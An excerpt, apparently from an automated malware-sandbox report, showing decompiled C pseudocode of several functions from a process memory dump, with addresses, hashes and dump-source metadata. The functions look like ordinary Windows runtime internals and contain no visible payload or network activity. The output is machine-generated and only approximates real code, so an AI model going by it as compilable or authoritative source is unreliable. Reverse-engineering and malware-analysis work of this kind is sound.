				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x4b386b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04A62280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E04B188F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E04A8AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x4b3b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x4b384c0;
										if(_t69 >=  *0x4b384c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04B19063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E04A4922A(_t82);
							_t53 = E04A67D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04B18B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x4b386c0; // 0xdc07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x4b386b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x4b386bc;
										_t72 = 0x4b386b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04A49240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x4b386c4;
									_t72 = 0x4b386c0;
									L18:
									E04A79B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x04a49100
0x04a49100
0x04a49100
0x04a49100
0x04a49102
0x04a49107
0x04a4910c
0x04a49110
0x04a49115
0x04a49136
0x04a49143
0x04aa37e4
0x04aa37e4
0x04a49149
0x04a4914e
0x04a4914e
0x04a49117
0x04a4911d
0x00000000
0x00000000
0x04a4911f
0x04a49125
0x00000000
0x04a49151
0x04a49158
0x04a4915d
0x04a49161
0x04a49168
0x04aa3715
0x00000000
0x04a4916e
0x04a4916e
0x04a49175
0x04a49177
0x04a4917e
0x04a4917f
0x04a49182
0x04a49182
0x04a49187
0x04a49187
0x04a4918a
0x04a4918d
0x04a4918f
0x04a49192
0x04a49195
0x04a49198
0x04a49198
0x04a49198
0x04a4919a
0x00000000
0x00000000
0x04aa371f
0x04aa3721
0x04aa3727
0x04aa372f
0x04aa3733
0x04aa3735
0x04aa3738
0x04aa373b
0x04aa373d
0x04aa3740
0x00000000
0x00000000
0x04aa3746
0x04aa3749
0x00000000
0x00000000
0x04aa374f
0x04aa3751
0x00000000
0x00000000
0x04aa3757
0x04aa3759
0x04aa375c
0x04aa375c
0x04aa375e
0x04aa375e
0x04aa3761
0x04aa3764
0x00000000
0x00000000
0x04aa3766
0x04aa3768
0x04aa37a3
0x04aa37a3
0x04aa37a5
0x04aa37a7
0x04aa37ad
0x04aa37b0
0x04aa37b2
0x04aa37bc
0x04aa37c2
0x04aa37c2
0x04aa37b2
0x04a49187
0x04a49187
0x04a4918a
0x04a4918d
0x04a4918f
0x04a49192
0x04a49195
0x00000000
0x04a49195
0x00000000
0x04a49187
0x04aa376a
0x04aa376a
0x04aa376c
0x04aa376c
0x04aa376f
0x04aa3775
0x00000000
0x00000000
0x04aa3777
0x04aa3779
0x00000000
0x00000000
0x04aa3782
0x04aa3787
0x04aa3789
0x04aa3790
0x04aa3790
0x04aa378b
0x04aa378b
0x04aa378b
0x04aa3792
0x04aa3795
0x04aa3795
0x04aa3798
0x04aa3798
0x04aa379b
0x04aa379b
0x04a491a3
0x04a491a9
0x04a491b0
0x04a491b4
0x04a491b4
0x04a491bb
0x04a491c0
0x04a491c5
0x04a491c7
0x04aa37da
0x04a491cd
0x04a491cd
0x04a491cd
0x04a491d2
0x04a491d5
0x04a49239
0x04a49239
0x04a491d7
0x04a491db
0x04a491e1
0x04a491e7
0x04a491fd
0x04a49203
0x04a4921e
0x04a49223
0x00000000
0x04a49223
0x04a49205
0x04a49208
0x04a4920c
0x04a49214
0x04a49214
0x04a491e9
0x04a491e9
0x04a491ee
0x04a491f3
0x04a491f3
0x04a491f3
0x04a491e7
0x00000000
0x04a491db
0x04a49187
0x04a49168

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df783c755ad4300dbabe32aa42bf5a30e1ef11557ad5f318f8f82db716d19078
Instruction ID: f9cce9a9063061e80912439ef0446e19a3d4a3f3fc0e0ca4f8c32add8c17f017
Opcode Fuzzy Hash: df783c755ad4300dbabe32aa42bf5a30e1ef11557ad5f318f8f82db716d19078
Instruction Fuzzy Hash: 3E31AEB1A022449FEB61EF7DC188BAFB7F9BBC8314F14814AD40467250D334B990CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04A60050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04A60050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x4b3d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04A79ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E04A8B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04B18A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04A79702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x4b3b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x04a60055
0x04a6005d
0x04a60062
0x04a6006c
0x04a6006f
0x04a60074
0x04a6007a
0x04a6007a
0x04a60080
0x04a60080
0x04a60087
0x04a6008d
0x04a6008f
0x04a60093
0x04a60095
0x04a6009b
0x04a600f8
0x04a600fb
0x04a600fc
0x04a600ff
0x04a60108
0x04a60108
0x04a600a2
0x04a600a6
0x04a600b3
0x04a600bc
0x04a600c5
0x04a600ca
0x04aac01e
0x00000000
0x00000000
0x04aac02d
0x04a600d5
0x04a600d9
0x04aac03d
0x04aac046
0x04aac046
0x04a600df
0x04a600e2
0x04a600ea
0x04a600ef
0x04a600f2
0x04a600f6
0x04a60111
0x04a60117
0x04a60117
0x00000000
0x04a600f6
0x04a600d0
0x04a600d0
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c525618f2c55922673866104f8596a93f95b74a6b7151d16cfb774b47e7fac25
Instruction ID: c17fbf4dd0bf2d1774cd4cfd67a87ae54a55be793cddc32c3ad1a3bdffa31290
Opcode Fuzzy Hash: c525618f2c55922673866104f8596a93f95b74a6b7151d16cfb774b47e7fac25
Instruction Fuzzy Hash: 09317831605B048FE721CF28C940B9AB3E5FF88718F15456DE49A87AA0EB75BC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04AC6C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04AC6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04A67D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4b37b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04A64620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E04A8F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04A67D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04A89AE0();
						_t23 = L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x04ac6c0a
0x04ac6c0f
0x04ac6c10
0x04ac6c13
0x04ac6c15
0x04ac6c19
0x04ac6c1c
0x04ac6c21
0x04ac6c28
0x04ac6c3a
0x04ac6c2a
0x04ac6c33
0x04ac6c33
0x04ac6c3f
0x04ac6c48
0x04ac6c4d
0x04ac6c60
0x04ac6c65
0x04ac6c69
0x04ac6c73
0x04ac6c79
0x04ac6c7f
0x04ac6c86
0x04ac6c90
0x04ac6c94
0x04ac6ca6
0x04ac6cb2
0x04ac6cbd
0x04ac6cbd
0x04ac6cc3
0x04ac6cc7
0x04ac6ccb
0x04ac6cd0
0x04ac6cd1
0x04ac6ce2
0x04ac6ce2
0x04ac6c69
0x04ac6ced

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 166e20b923fae859bf7309eb8a126c248bb5223eae9c22855dbe1589ec34c0b1
Instruction ID: 8636eaa18be2b4788e147b2d37d28b08eacd84dbad231d0ee2606324c337c453
Opcode Fuzzy Hash: 166e20b923fae859bf7309eb8a126c248bb5223eae9c22855dbe1589ec34c0b1
Instruction Fuzzy Hash: 8121DEB1A10644AFD711DF68D980F6AB7B8FF48748F04006AF905C7790E634ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04A890AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04A890AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E04A9D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E04A7E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04A64620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E04A8F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E04A7A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x04a890af
0x04a890b8
0x04a890bb
0x04a890bf
0x04a890c2
0x04a890c2
0x04a890c8
0x04a890cb
0x04a890cd
0x04ac14d7
0x04ac14eb
0x04ac14eb
0x00000000
0x04ac14eb
0x04ac14db
0x04ac14e6
0x00000000
0x04ac14f2
0x04ac14e8
0x00000000
0x04ac14e8
0x04a890d8
0x04a890da
0x04a890dd
0x04a890e5
0x00000000
0x04a89139
0x04a890fa
0x04a890fe
0x04a89142
0x00000000
0x04a89142
0x04a89104
0x04a89107
0x04a8910b
0x04a89110
0x04a89118
0x04a89147
0x04a89148
0x04a8914f
0x04a89150
0x04a89151
0x04a89152
0x04a89156
0x04a8915d
0x04a89160
0x04a89168
0x04a8916c
0x04a891bc
0x04a891be
0x00000000
0x04a891be
0x04a8916e
0x04a89173
0x04a89176
0x00000000
0x00000000
0x04a8917c
0x04a89180
0x04a891b5
0x00000000
0x04a891b5
0x04a89182
0x04a89185
0x04a89189
0x00000000
0x00000000
0x04a8918e
0x04a89190
0x04a89198
0x00000000
0x00000000
0x04a891a0
0x00000000
0x04a891ad
0x04a891ad
0x04a891b0
0x04a891b1
0x00000000
0x04a89185
0x04a8911a
0x04a8911c
0x04a8911f
0x04a89125
0x04a89127
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: fc4ebd9e0b1027e575aa9c589b346ca79537a456e2adf93eb11afcdc5054095b
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 86217FB1A01204EFDB20EF59C944AAAF7FCEB44714F14886EE945A7200D330BD409B90

Uniqueness

Uniqueness Score: -1.00%

Function 04A73B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04A73B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x4b384c4; // 0x0
				_v12 = 1;
				_v8 =  *0x4b384c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4b384c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E04A8AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E04A8FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4b384c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x4b384c4; // 0x0
					L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x04a73b89
0x04a73b96
0x04a73ba1
0x04a73bab
0x04a73bb5
0x04a73bb9
0x04ab6298
0x04a73bbf
0x04a73bc2
0x04a73bc3
0x04a73bc9
0x04a73bca
0x04a73bcc
0x04a73bcd
0x04a73bd4
0x04a73bd6
0x04a73bdb
0x04a73bea
0x04a73bf7
0x04a73bfb
0x04a73bff
0x04a73c09
0x04a73c0a
0x04a73c0b
0x04a73c0f
0x04a73c14
0x04a73c18
0x04a73c18
0x04a73bfb
0x04a73c1b
0x04a73c30
0x04a73c30
0x04a73c3d

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aabbe4d1f26228b4b74ffa9e3238e776ea0c414ab581201ea7019ab0ffe6f2ff
Instruction ID: cb0bd167b9d0e58857b99db710155361d4f2f05c581a1a25565641633c044eea
Opcode Fuzzy Hash: aabbe4d1f26228b4b74ffa9e3238e776ea0c414ab581201ea7019ab0ffe6f2ff
Instruction Fuzzy Hash: 41217CB2A00108AFDB10EF58DE81B5EBBBDFB44708F150069EA09AB651D375BD15DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04AC6CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04AC6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04A67D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04A67D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4a25c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E04A7F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E04A7F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04AC7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04A62400( &_v52);
								}
								_t21 = L04A62400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x04ac6cfb
0x04ac6d00
0x04ac6d02
0x04ac6d06
0x04ac6d0a
0x04ac6d0e
0x04ac6d19
0x04ac6d2b
0x04ac6d1b
0x04ac6d24
0x04ac6d24
0x04ac6d33
0x04ac6d39
0x04ac6d46
0x04ac6d4f
0x04ac6d61
0x04ac6d51
0x04ac6d5a
0x04ac6d5a
0x04ac6d69
0x04ac6d6b
0x04ac6d6d
0x04ac6d6f
0x04ac6d6f
0x04ac6d74
0x04ac6d79
0x04ac6d7a
0x04ac6d7f
0x04ac6d82
0x04ac6d88
0x04ac6d89
0x04ac6d90
0x04ac6d94
0x04ac6da7
0x04ac6db1
0x04ac6db1
0x04ac6dbb
0x04ac6dbb
0x04ac6d90
0x04ac6d69
0x04ac6d46
0x04ac6dc6

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 745eab9a2079065a83b3d2564da122403bbf0b2a5701134d53b59b0605bbadc9
Instruction ID: f0daba93354d11df15280e8cfac11e24f97ba583df76c3853676bb2c1f5b2515
Opcode Fuzzy Hash: 745eab9a2079065a83b3d2564da122403bbf0b2a5701134d53b59b0605bbadc9
Instruction Fuzzy Hash: 62210772500B45AFE712EF28CA44BA7B7EDEF81744F04095AFD40C7250E734E908C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 04B1070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04B1070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E04B107DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E04B0AFDE( &_v8,  &_v12);
					E04B11293(_t38, _v28, _t60);
					if(E04A67D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E04B014FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x04b1071b
0x04b10724
0x04b10734
0x04b10738
0x04b1074b
0x04b1074b
0x04b10753
0x04b10753
0x04b10759
0x04b1075d
0x04b10774
0x04b10779
0x04b1077d
0x04b10789
0x04b10795
0x04b107a7
0x04b10797
0x04b107a0
0x04b107a0
0x04b107af
0x04b107c4
0x04b107cd
0x04b107cd
0x04b107af
0x04b107dc

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 345b482d77f8f8a92511e16c58a4121ead058833cf946d6a1ca00a96264f1642
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 642126363042049FD705EF18C880B6ABBA5FFC4354F0485ADF9958B795D730E949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04A6AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04A6AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04A67D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04A67D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04A67D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
